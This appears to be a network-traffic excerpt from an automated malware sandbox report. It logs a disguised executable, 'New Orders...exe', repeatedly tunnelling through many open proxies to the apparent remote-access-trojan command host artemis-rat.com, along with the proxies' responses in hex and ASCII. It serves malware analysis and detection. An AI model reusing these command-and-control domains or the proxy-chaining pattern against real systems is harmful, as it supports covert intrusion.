                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1623192.168.2.95472245.14.174.148807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:47.159068108 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:47.313678980 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:47 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1624192.168.2.95469567.43.228.253263237672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:47.159780025 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1625192.168.2.95431974.119.144.6041457672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:47.163923025 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1626192.168.2.95471175.84.199.80807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:47.165028095 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:47.667912960 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:48.273438931 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:57.110934019 CET60INHTTP/1.0 200 Connection Established
                                                                                        Proxy-agent: Apache


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1627192.168.2.949993125.99.106.25031287672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:47.165036917 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:50.164092064 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:50.558887005 CET1286INHTTP/1.1 503 Service Unavailable
                                                                                        Server: squid/4.15
                                                                                        Mime-Version: 1.0
                                                                                        Date: Mon, 11 Mar 2024 15:16:50 GMT
                                                                                        Content-Type: text/html;charset=utf-8
                                                                                        Content-Length: 3894
                                                                                        X-Squid-Error: ERR_DNS_FAIL 0
                                                                                        Vary: Accept-Language
                                                                                        Content-Language: en
                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 31 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 31 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 65 66 65 66 65 66 3b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 09 63 6f 6c 6f 72 3a 20 23 31 65 31 65 31 65 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 74 69 74 6c 65 20 61 72 65 61 20 2a 2f 0a 23 74 69 74 6c 65 73 20 7b 0a 09 6d 61 72 67 69 6e
                                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2021 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2021 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. *//* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, sans-serif;}html body {margin: 0;padding: 0;background: #efefef;font-size: 12px;color: #1e1e1e;}/* Page displayed title area */#titles {margin


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1628192.168.2.954773104.20.75.132807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:47.165900946 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:47.616713047 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:47.776702881 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:47 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1629192.168.2.954779185.162.230.201807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:47.169560909 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:47.325627089 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:47 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1630192.168.2.954780104.21.85.109807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:47.169611931 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:47.326040030 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:47 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1631192.168.2.95460320.206.106.192807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:47.169687986 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:47.494446993 CET319INHTTP/1.1 403 Forbidden
                                                                                        Server: squid
                                                                                        Mime-Version: 1.0
                                                                                        Date: Mon, 11 Mar 2024 15:16:47 GMT
                                                                                        Content-Type: text/html;charset=utf-8
                                                                                        Content-Length: 17
                                                                                        X-Squid-Error: ERR_ACCESS_DENIED 0
                                                                                        X-Cache: MISS from cdn-fintech.info
                                                                                        X-Cache-Lookup: NONE from cdn-fintech.info:8123
                                                                                        Connection: keep-alive
                                                                                        Data Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44
                                                                                        Data Ascii: ERR_ACCESS_DENIED


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1632192.168.2.954586125.122.26.24210807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:47.169830084 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1633192.168.2.954792104.23.107.172807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:47.169882059 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:47.325778008 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:47 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1634192.168.2.95472552.13.248.2931287672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:47.169931889 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:47.361802101 CET116INHTTP/1.1 200 OK
                                                                                        Date: Mon, 11 Mar 2024 15:16:47 GMT
                                                                                        Server: nginx
                                                                                        Content-Type: text/plain
                                                                                        Content-Length: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1635192.168.2.95477764.202.186.212587672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:47.169950962 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:47.616682053 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:48.148911953 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:49.133229971 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:51.242197990 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:53.291851044 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:55.445280075 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:59.445286989 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:07.445266962 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1636192.168.2.954801104.17.248.164807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:47.170201063 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:47.326183081 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:47 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1637192.168.2.95457147.100.236.2380807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:47.170285940 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:48.249995947 CET39INHTTP/1.1 200 Connection established


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1638192.168.2.954721162.241.53.72537557672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:47.170286894 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:47.742006063 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
